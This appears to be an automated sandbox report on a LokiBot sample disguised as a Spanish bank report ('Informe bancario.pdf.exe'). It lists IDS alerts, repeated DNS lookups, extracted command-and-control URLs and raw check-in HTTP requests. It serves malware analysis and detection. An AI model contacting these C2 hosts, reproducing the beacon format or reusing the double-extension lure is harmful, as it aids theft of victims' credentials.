              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49844 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49844 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49844 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49844 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49845 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49845 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49845 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49845 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49852 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49852 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49852 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49852 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49859 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49859 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49859 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49859 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49865 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49865 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49865 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49865 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49872 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49872 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49872 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49872 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49873 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49873 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49873 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49873 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49875 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49875 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49875 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49875 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49876 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49876 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49876 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49876 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49877 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49877 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49877 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49877 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49881 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49881 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49881 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49881 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49882 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49882 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49882 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49882 -> 172.67.154.72:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49883 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49883 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49883 -> 104.21.40.153:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49883 -> 104.21.40.153:80
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeDNS query: kossa.xyz
              Source: DNS query: kossa.xyz
              Source: Yara matchFile source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPE
              Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
              Source: Malware configuration extractorURLs: http://kossa.xyz/esi/pp/play.php
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 190Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 190Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:54:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2%2F3%2FYGTqLRrwVxRYD5V6o8dLFQPAl70RKKELnXHzwiFsIH2XD55%2F8HTU0BtJrL1Zc0%2BqzyVQYKfoLsSi1rv5TON5EVTpte0zWNjM9a5ORZnqM1owuJ8kheCb5R4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe6729ff697711-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:54:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vInpdW2j2t0TkXgNWrVbBrhz59C5ZUZepr6EXNkEDlN5Mmpr3I3XN9MXchA%2FuUuBCNvin54PKkEVjvkFMD1mUTaTWJDjljOyWMNNY2gG90YnT13wAFVp5IWO%2BbU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe6734694506b6-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:54:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7V5Gc3atXU%2F7rltrm12KGvbycRYFCgLiJibtU08Is1x6vGrWm%2FIN9lvKLV2xmFkSfDE5rh4%2Fv1K4HHvGipuCkiTMbAUFNj04N3yK7qCmAv2YMqNtVqxcv%2Fzmb0Q%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe673df81e8895-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:54:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RqbB9AlMckjRfLEXC38HUt8viJ2CR%2FdVWCxsO%2BoHbSN0xpni4oUpMZeSqUIbFeVVkL%2Bs3vYMe6TfFwzCv3eFt4urQt%2BRsoBtSMZHf4OabSRk9sogB2WT1NRzmJw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe67468dd5066a-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:54:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=On2%2FpBbJ8An%2FGT14pb6QnHaMiacGEvLWqvhnE5%2FSD4rLjnj6Rg8CaXBDk5x6PgGIs1zw%2F9xQzIw34H4JV5ysx6pavr9OaSBZznt7OiXOPZ7yuub0vKY0I4ucXdc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe674f5bcf9113-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:54:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A5YyEf0yuwnHwY6Ol0zSUHeAlII5yG%2BtbGShw%2FjBJg5diEWvZQfKwCUTDIJxxICscixc6esDrhJtzgAn7OPqg90dV5gKlSdKD%2FW1lVNU2OPU2c2jZDcVkVCMggc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe675ebf0c073a-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
